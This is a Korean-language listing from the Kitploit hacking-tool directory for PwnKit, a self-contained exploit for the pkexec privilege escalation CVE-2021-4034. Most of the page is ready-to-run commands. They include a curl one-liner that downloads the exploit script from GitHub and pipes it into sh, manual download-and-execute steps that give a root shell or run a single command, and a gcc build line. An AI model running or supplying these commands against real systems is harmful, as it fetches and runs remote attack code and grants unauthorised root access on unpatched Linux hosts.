Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PwnKit — CVE-2021-4034 - Pkexec 로컬 권한 상승을 위한 자체 포함 익스플로잇 | Kitploit
도구/GitHubGitHub/ramahmdr/pwnkit
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubramahmdr/pwnkit

PwnKit

CVE-2021-4034 - Pkexec 로컬 권한 상승을 위한 자체 포함 익스플로잇

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PwnKit

CVE-2021-4034 - Pkexec 로컬 권한 상승 취약점에 대한 자체 포함 익스플로잇

사용법

Ubuntu, Debian, Fedora 및 CentOS 기반의 취약한 Linux 배포판에서 기본적으로 바로 작동합니다.

root@kitploit:~
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

수동 실행

root@kitploit:~
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

패치된 버전

패치된 버전에서 익스플로잇을 실행하면 다음과 같은 출력이 생성됩니다.

빌드

root@kitploit:~
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

기술적 세부 사항

  • https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

참고 자료

  • https://github.com/arthepsy/CVE-2021-4034/
도구 다운로드